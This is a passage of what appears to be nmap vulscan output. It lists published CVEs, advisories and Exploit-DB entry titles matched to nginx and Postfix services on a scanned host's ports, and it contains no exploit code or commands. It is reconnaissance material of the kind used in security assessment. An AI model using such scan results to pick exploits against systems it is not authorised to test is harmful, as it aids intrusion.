12418| [53590] nginx up to 0.8.9 unknown vulnerability
12419| [51533] nginx 0.7.64 Terminal privilege escalation
12420| [50905] nginx up to 0.8.9 directory traversal
12421| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
12422| [50043] nginx up to 0.8.10 memory corruption
12423|
12424| MITRE CVE - https://cve.mitre.org:
12425| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
12426| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
12427| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
12428| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
12429| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
12430| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
12431| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
12432| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
12433| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
12434| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
12435| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
12436| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
12437| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
12438|
12439| SecurityFocus - https://www.securityfocus.com/bid/:
12440| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
12441| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
12442| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
12443| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
12444| [82230] nginx Multiple Denial of Service Vulnerabilities
12445| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
12446| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
12447| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
12448| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
12449| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
12450| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
12451| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
12452| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
12453| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
12454| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
12455| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
12456| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
12457| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
12458| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
12459| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
12460| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
12461| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
12462| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
12463| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
12464| [40420] nginx Directory Traversal Vulnerability
12465| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
12466| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
12467| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
12468| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
12469| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
12470|
12471| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12472| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
12473| [84172] nginx denial of service
12474| [84048] nginx buffer overflow
12475| [83923] nginx ngx_http_close_connection() integer overflow
12476| [83688] nginx null byte code execution
12477| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
12478| [82319] nginx access.log information disclosure
12479| [80952] nginx SSL spoofing
12480| [77244] nginx and Microsoft Windows request security bypass
12481| [76778] Naxsi module for Nginx nx_extract.py directory traversal
12482| [74831] nginx ngx_http_mp4_module.c buffer overflow
12483| [74191] nginx ngx_cpystrn() information disclosure
12484| [74045] nginx header response information disclosure
12485| [71355] nginx ngx_resolver_copy() buffer overflow
12486| [59370] nginx characters denial of service
12487| [59369] nginx DATA source code disclosure
12488| [59047] nginx space source code disclosure
12489| [58966] nginx unspecified directory traversal
12490| [54025] nginx ngx_http_parse.c denial of service
12491| [53431] nginx WebDAV component directory traversal
12492| [53328] Nginx CRC-32 cached domain name spoofing
12493| [53250] Nginx ngx_http_parse_complex_uri() function code execution
12494|
12495| Exploit-DB - https://www.exploit-db.com:
12496| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
12497| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
12498| [25499] nginx 1.3.9-1.4.0 DoS PoC
12499| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
12500| [14830] nginx 0.6.38 - Heap Corruption Exploit
12501| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
12502| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
12503| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
12504| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
12505| [9829] nginx 0.7.61 WebDAV directory traversal
12506|
12507| OpenVAS (Nessus) - http://www.openvas.org:
12508| [864418] Fedora Update for nginx FEDORA-2012-3846
12509| [864310] Fedora Update for nginx FEDORA-2012-6238
12510| [864209] Fedora Update for nginx FEDORA-2012-6411
12511| [864204] Fedora Update for nginx FEDORA-2012-6371
12512| [864121] Fedora Update for nginx FEDORA-2012-4006
12513| [864115] Fedora Update for nginx FEDORA-2012-3991
12514| [864065] Fedora Update for nginx FEDORA-2011-16075
12515| [863654] Fedora Update for nginx FEDORA-2011-16110
12516| [861232] Fedora Update for nginx FEDORA-2007-1158
12517| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
12518| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
12519| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
12520| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
12521| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
12522| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
12523| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
12524| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
12525| [100659] nginx Directory Traversal Vulnerability
12526| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
12527| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
12528| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
12529| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
12530| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
12531| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
12532| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
12533| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
12534| [71297] FreeBSD Ports: nginx
12535| [71276] FreeBSD Ports: nginx
12536| [71239] Debian Security Advisory DSA 2434-1 (nginx)
12537| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
12538| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
12539| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
12540| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
12541| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
12542| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
12543| [64894] FreeBSD Ports: nginx
12544| [64869] Debian Security Advisory DSA 1884-1 (nginx)
12545|
12546| SecurityTracker - https://www.securitytracker.com:
12547| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
12548| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
12549| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
12550| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
12551|
12552| OSVDB - http://www.osvdb.org:
12553| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
12554| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
12555| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
12556| [92796] nginx ngx_http_close_connection Function Crafted r->
12557| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
12558| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
12559| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
12560| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
12561| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
12562| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
12563| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
12564| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
12565| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
12566| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
12567| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
12568| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
12569| [62617] nginx Internal DNS Cache Poisoning Weakness
12570| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
12571| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
12572| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
12573| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
12574| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
12575| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
12576| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
12577| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
12578| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
12579| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
12580|_
12581465/tcp open ssl/smtp Postfix smtpd
12582| vulscan: VulDB - https://vuldb.com:
12583| [108975] Apple macOS up to 10.13.1 Postfix unknown vulnerability
12584| [98314] PostfixAdmin up to 3.0.1 AliasHandler delete.php gen_show_status denial of service
12585| [71720] Postfix up to 2.3.0 backup.php pacrypt sql injection
12586| [12746] Postfix Admin 2.3.6 functions.inc.php sql injection
12587| [57422] Postfix memory corruption
12588| [56843] Postfix up to 2.7.2 Cleartext weak encryption
12589|
12590| MITRE CVE - https://cve.mitre.org:
12591| [CVE-2013-2852] Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message.
12592| [CVE-2011-1720] The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method.
12593| [CVE-2011-0411] The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9, and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack.
12594| [CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configures postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions.
12595| [CVE-2009-2939] The postfix.postinst script in the Debian GNU/Linux and Ubuntu postfix 2.5.5 package grants the postfix user write access to /var/spool/postfix/pid, which might allow local users to conduct symlink attacks that overwrite arbitrary files.
12596| [CVE-2008-4977] ** DISPUTED ** postfix_groups.pl in Postfix 2.5.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/postfix_groups.stdout, (2) /tmp/postfix_groups.stderr, and (3) /tmp/postfix_groups.message temporary files. NOTE: the vendor disputes this vulnerability, stating "This is not a real issue ... users would have to edit a script under /usr/lib to enable it."
12597| [CVE-2008-3889] Postfix 2.4 before 2.4.9, 2.5 before 2.5.5, and 2.6 before 2.6-20080902, when used with the Linux 2.6 kernel, leaks epoll file descriptors during execution of "non-Postfix" commands, which allows local users to cause a denial of service (application slowdown or exit) via a crafted command, as demonstrated by a command in a .forward file.
12598| [CVE-2008-3646] The Postfix configuration file in Mac OS X 10.5.5 causes Postfix to be network-accessible when mail is sent from a local command-line tool, which allows remote attackers to send mail to local Mac OS X users.
12599| [CVE-2008-2937] Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name.
12600| [CVE-2008-2936] Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.
12601| [CVE-2007-3791] Buffer overflow in the w_read function in sockets.c in Cami Sardinha and Nigel Kukard policyd before 1.81 for Postfix allows remote attackers to cause a denial of service and possibly execute arbitrary code via long SMTP commands. NOTE: some of these details are obtained from third party information.
12602| [CVE-2006-0213] Kolab Server 2.0.1, 2.0.2 and development versions pre-2.1-20051215 and earlier, when authenticating users via secure SMTP, stores authentication credentials in plaintext in the postfix.log file, which allows local users to gain privileges.
12603| [CVE-2005-1127] Format string vulnerability in the log function in Net::Server 0.87 and earlier, as used in Postfix Greylisting Policy Server (Postgrey) 1.18 and earlier, and possibly other products, allows remote attackers to cause a denial of service (crash) via format string specifiers that are not properly handled before being sent to syslog, as demonstrated using sender addresses to Postgrey.
12604| [CVE-2005-0337] Postfix 2.1.3, when /proc/net/if_inet6 is not available and permit_mx_backup is enabled in smtpd_recipient_restrictions, allows remote attackers to bypass e-mail restrictions and perform mail relaying by sending mail to an IPv6 hostname.
12605| [CVE-2004-1113] SQL injection vulnerability in SQLgrey Postfix greylisting service before 1.2.0 allows remote attackers to execute arbitrary SQL commands via the (1) sender or (2) recipient e-mail addresses.
12606| [CVE-2004-1088] Postfix server for Apple Mac OS X 10.3.6, when using CRAM-MD5, allows remote attackers to send mail without authentication by replaying authentication information.
12607| [CVE-2004-0925] Postfix on Mac OS X 10.3.x through 10.3.5, with SMTPD AUTH enabled, does not properly clear the username between authentication attempts, which allows users with the longest username to prevent other valid users from being able to authenticate.
12608| [CVE-2003-0540] The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.
12609| [CVE-2003-0468] Postfix 1.1.11 and earlier allows remote attackers to use Postfix to conduct "bounce scans" or DDos attacks of other hosts via an email address to the local host containing the target IP address and service name followed by a "!" string, which causes Postfix to attempt to use SMTP to communicate with the target on the associated port.
12610| [CVE-2001-0894] Vulnerability in Postfix SMTP server before 20010228-pl07, when configured to email the postmaster when SMTP errors cause the session to terminate, allows remote attackers to cause a denial of service (memory exhaustion) by generating a large number of SMTP errors, which forces the SMTP session log to grow too large.
12611|
12612| SecurityFocus - https://www.securityfocus.com/bid/:
12613| [96142] PostfixAdmin CVE-2017-5930 Session Management Security Bypass Vulnerability
12614| [90814] Postfix Admin Multiple Cross Site Request Forgery Vulnerabilities
12615| [67250] Postfix Arbitrary Content Security Bypass Vulnerability
12616| [66455] Postfix Admin 'functions.inc.php' SQL Injection Vulnerability
12617| [65184] Fail2ban Postfix Filter Remote Denial of Service Vulnerability
12618| [51680] Postfix Admin Multiple SQL Injection and Cross Site Scripting Vulnerabilities
12619| [47778] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
12620| [36469] Debian and Ubuntu Postfix Insecure Temporary File Creation Vulnerability
12621| [31721] Apple Mac OS X 10.5 Postfix Security Bypass Vulnerability
12622| [30977] Postfix 'epoll' Linux Event Handler Local Denial of Service Vulnerability
12623| [30691] Postfix Local Information Disclosure and Local Privilege Escalation Vulnerabilities
12624| [13133] Salim Gasmi GLD Postfix Greylisting Daemon Format String Vulnerability
12625| [13129] Salim Gasmi GLD Postfix Greylisting Daemon Buffer Overflow Vulnerability
12626| [12445] Postfix IPv6 Unauthorized Mail Relay Vulnerability
12627| [11898] SQLgrey Postfix Greylisting Service Unspecified SQL Injection Vulnerability
12628| [11633] SQLgrey Postfix Greylisting Service SQL Injection Vulnerability
12629| [11323] Apple Mac OS X Postfix Release SMTPD AUTH Username Denial Of Service Vulnerability
12630| [8362] Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability
12631| [8361] Postfix Connection Proxying Vulnerability
12632| [8333] Multiple Postfix Denial of Service Vulnerabilities
12633| [3638] SuSEConfig.postfix chroot Local DoS Attack Vulnerability
12634| [3637] SuSEConfig.postfix chroot File Ownership Vulnerability
12635| [3544] Postfix SMTP Log Denial Of Service Vulnerability
12636| [1428] cyrus With postfix and Procmail Remote Shell Expansion Vulnerabilities
12637|
12638| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12639| [72752] Postfix Admin multiple parameters SQL injection
12640| [72751] PostfixAdmin multiple parameters cross-site scripting
12641| [67359] Postfix Cyrus SASL library in the SMTP server code execution
12642| [55970] SUSE Linux Enterprise postfix security bypass
12643| [53425] Postfix in Debian and Ubuntu pid symlink
12644| [45876] Apple Mac OS X Postfix configuration file weak security
12645| [44865] Postfix file descriptor denial of service
12646| [44461] Postfix email information disclosure
12647| [44460] Postfix symlink code execution
12648| [22655] RHSA-2005:152 updates for postfix not installed
12649| [19218] Postfix IPv6 mail relay
12650| [18435] SQLgrey Postfix greylisting service SQL injection
12651| [18353] Postfix CRAM-MD5 authentication replay attack
12652| [17998] SQLgrey Postfix greylisting service SQL injection
12653| [17595] Apple Mac OS postfix SMTPD AUTH denial of service
12654| [12816] Postfix MAIL FROM or RCPT TO denial of service
12655| [12815] Postfix could be used as a distributed denial of service tool
12656| [7568] Postfix SMTP log denial of service
12657| [4905] Cyrus with postfix and procmail integration could allow remote command execution
12658|
12659| Exploit-DB - https://www.exploit-db.com:
12660| [25392] Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability
12661| [22982] Postfix 1.1.x Denial of Service Vulnerabilities (2)
12662| [22981] Postfix 1.1.x Denial of Service Vulnerabilities (1)
12663| [16841] GLD (Greylisting Daemon) Postfix Buffer Overflow
12664| [10023] Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow
12665| [6472] Postfix < 2.4.9, 2.5.5, 2.6-20080902 - (.forward) Local DoS Exploit
12666| [6337] Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit
12667| [934] gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit
12668|
12669| OpenVAS (Nessus) - http://www.openvas.org:
12670| [902517] Postfix SMTP Server Cyrus SASL Support Memory Corruption Vulnerability
12671| [881389] CentOS Update for postfix CESA-2011:0422 centos5 x86_64
12672| [881293] CentOS Update for postfix CESA-2011:0843 centos4 x86_64
12673| [881278] CentOS Update for postfix CESA-2011:0422 centos4 x86_64
12674| [881267] CentOS Update for postfix CESA-2011:0843 centos5 x86_64
12675| [880520] CentOS Update for postfix CESA-2011:0422 centos5 i386
12676| [880509] CentOS Update for postfix CESA-2011:0843 centos5 i386
12677| [880488] CentOS Update for postfix CESA-2011:0843 centos4 i386
12678| [880485] CentOS Update for postfix CESA-2011:0422 centos4 i386
12679| [880268] CentOS Update for postfix CESA-2008:0839 centos3 i386
12680| [880023] CentOS Update for postfix CESA-2008:0839 centos3 x86_64
12681| [870658] RedHat Update for postfix RHSA-2011:0423-01
12682| [870440] RedHat Update for postfix RHSA-2011:0843-01
12683| [870418] RedHat Update for postfix RHSA-2011:0422-01
12684| [870021] RedHat Update for postfix RHSA-2008:0839-01
12685| [863100] Fedora Update for postfix FEDORA-2011-6777
12686| [863097] Fedora Update for postfix FEDORA-2011-6771
12687| [862950] Fedora Update for postfix FEDORA-2011-3394
12688| [862938] Fedora Update for postfix FEDORA-2011-3355
12689| [860510] Fedora Update for postfix FEDORA-2008-8593
12690| [860419] Fedora Update for postfix FEDORA-2008-8595
12691| [850126] SuSE Update for postfix SUSE-SA:2010:011
12692| [850031] SuSE Update for postfix SUSE-SA:2008:040
12693| [840658] Ubuntu Update for postfix USN-1131-1
12694| [840648] Ubuntu Update for postfix USN-1113-1
12695| [840227] Ubuntu Update for postfix vulnerabilities USN-642-1
12696| [840190] Ubuntu Update for postfix vulnerability USN-636-1
12697| [831400] Mandriva Update for postfix MDVSA-2011:090 (postfix)
12698| [830713] Mandriva Update for postfix MDVSA-2008:171 (postfix)
12699| [830635] Mandriva Update for postfix MDVSA-2008:190 (postfix)
12700| [830075] Mandriva Update for postfix MDKA-2007:079 (postfix)
12701| [72452] Gentoo Security Advisory GLSA 201209-18 (postfixadmin)
12702| [71559] Gentoo Security Advisory GLSA 201206-33 (Postfix)
12703| [70744] FreeBSD Ports: postfixadmin
12704| [69770] FreeBSD Ports: postfix, postfix-base
12705| [69733] Debian Security Advisory DSA 2233-1 (postfix)
12706| [69363] FreeBSD Ports: postfix, postfix-base
12707| [66394] Mandriva Security Advisory MDVSA-2009:224-1 (postfix)
12708| [65957] SLES10: Security update for Postfix
12709| [65911] SLES10: Security update for Postfix
12710| [65353] SLES9: Security update for Postfix
12711| [65350] SLES9: Security update for postfix
12712| [64696] Mandrake Security Advisory MDVSA-2009:224 (postfix)
12713| [61646] Gentoo Security Advisory GLSA 200809-09 (postfix)
12714| [61445] Gentoo Security Advisory GLSA 200808-12 (postfix)
12715| [61435] Debian Security Advisory DSA 1629-2 (postfix)
12716| [61434] Debian Security Advisory DSA 1629-1 (postfix)
12717| [60836] FreeBSD Ports: postfix-policyd-weight
12718| [58580] Debian Security Advisory DSA 1361-1 (postfix-policyd)
12719| [53833] Debian Security Advisory DSA 093-1 (postfix)
12720| [53652] Debian Security Advisory DSA 363-1 (postfix)
12721|
12722| SecurityTracker - https://www.securitytracker.com:
12723| [1025521] Postfix SASL Authentication Heap Overflow Lets Remote Users Deny Service
12724| [1025179] Postfix Plaintext to TLS Switching Error Lets Remote Users Inject Plaintext Commands
12725| [1020800] Postfix Linux epoll File Descriptor Leak Lets Local Users Deny Service
12726| [1020700] Postfix Symlink Dereference Bug Lets Local Users Gain Elevated Privileges
12727| [1012395] Postfix CRAM-MD5 Replay Attack May Let Remote Users Send Mail
12728| [1011532] Postfix Buffer Error May Prevent Remote Users from Being Able to Authenticate Using SMTPD AUTH
12729| [1007382] Postfix Bounce Messages Let Remote Users Scan for Open Ports on Other Hosts
12730| [1007381] Postfix Address Resolver Parsing Bug Lets Remote Users Hang the System
12731| [1002756] Postfix Mail Server Can Be Crashed By Remote Users Initiating Unsuccessful Sessions
12732|
12733| OSVDB - http://www.osvdb.org:
12734| [94034] Linux Kernel Broadcom B43 Wireless Driver b43_request_firmware Function fwpostfix modprobe Parameter Format String Local Privilege Escalation
12735| [78567] Postfix Admin backup.php Unspecified SQL Injection
12736| [78566] Postfix Admin functions.inc.php pacrypt() Function Unspecified SQL Injection
12737| [78565] Postfix Admin create-domain.php Unspecified SQL Injection
12738| [78564] Postfix Admin Unspecified XSS
12739| [78563] Postfix Admin edit-alias.php Unspecified XSS
12740| [78562] Postfix Admin create-alias.php Unspecified XSS
12741| [78561] Postfix Admin create-domain.php Unspecified XSS
12742| [78560] Postfix Admin templates/edit-vacation.php domain Parameter XSS
12743| [78559] Postfix Admin templates/menu.php domain Parameter XSS
12744| [72259] Postfix SMTP Cyrus SASL Authentication Context Data Reuse Memory Corruption
12745| [71021] Postfix STARTTLS Arbitrary Plaintext Command Injection
12746| [68340] Artica postfix.events.php Unrestricted Access Information Disclosure
12747| [61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass
12748| [58325] Debian GNU/Linux postfix postfix.postinst Symlink Arbitrary File Overwrite
12749| [49634] Postfix postfix_groups.pl Multiple Temporary File Symlink Arbitrary File Overwrite
12750| [48973] Apple Mac OS X Postfix Network Access Configuration Weakness
12751| [48108] Postfix epoll File Descriptor Leak Local DoS
12752| [47659] Postfix Cross-user Filename Local Mail Interception
12753| [47658] Postfix Hardlink to Symlink Mailspool Arbitrary Content Append
12754| [43888] policyd-weight for Postfix Socket Handling Unspecified Arbitrary File Manipulation
12755| [38091] policyd for Postfix sockets.c read_w() Function SMTP Command Remote Overflow
12756| [22381] Kolab Server Secure SMTP postfix.log Authentication Credential Disclosure
12757| [13470] Postfix IPv6 Patch if_inet6 Failure Arbitrary Mail Relay
12758| [12339] SQLgrey Postfix greylisting service Unspecified SQL Injection
12759| [12200] Apple Mac OS X Postfix CRAM-MD5 Replay Credentials
12760| [11571] SQLgrey Postfix greylisting Email Address SQL Injection
12761| [10545] Postfix Multiple Mail Header SMTP listener DoS
12762| [10544] Postfix Malformed Envelope Address nqmgr DoS
12763| [10500] Apple Mac OS X Postfix SMTPD AUTH Username Overflow DoS
12764| [6551] Postfix Bounce Scan / Packet Amplification DDoS
12765| [1991] Postfix SMTP Log DoS
12766|_
12767587/tcp open smtp Postfix smtpd
12768| vulscan: VulDB - https://vuldb.com:
12769| [108975] Apple macOS up to 10.13.1 Postfix unknown vulnerability
12770| [98314] PostfixAdmin up to 3.0.1 AliasHandler delete.php gen_show_status denial of service
12771| [71720] Postfix up to 2.3.0 backup.php pacrypt sql injection
12772| [12746] Postfix Admin 2.3.6 functions.inc.php sql injection
12773| [57422] Postfix memory corruption
12774| [56843] Postfix up to 2.7.2 Cleartext weak encryption
12775|
12776| MITRE CVE - https://cve.mitre.org:
12777| [CVE-2013-2852] Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message.
12778| [CVE-2011-1720] The SMTP server in Postfix before 2.5.13, 2.6.x before 2.6.10, 2.7.x before 2.7.4, and 2.8.x before 2.8.3, when certain Cyrus SASL authentication methods are enabled, does not create a new server handle after client authentication fails, which allows remote attackers to cause a denial of service (heap memory corruption and daemon crash) or possibly execute arbitrary code via an invalid AUTH command with one method followed by an AUTH command with a different method.
12779| [CVE-2011-0411] The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9, and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack.
12780| [CVE-2010-0230] SUSE Linux Enterprise 10 SP3 (SLE10-SP3) and openSUSE 11.2 configures postfix to listen on all network interfaces, which might allow remote attackers to bypass intended access restrictions.
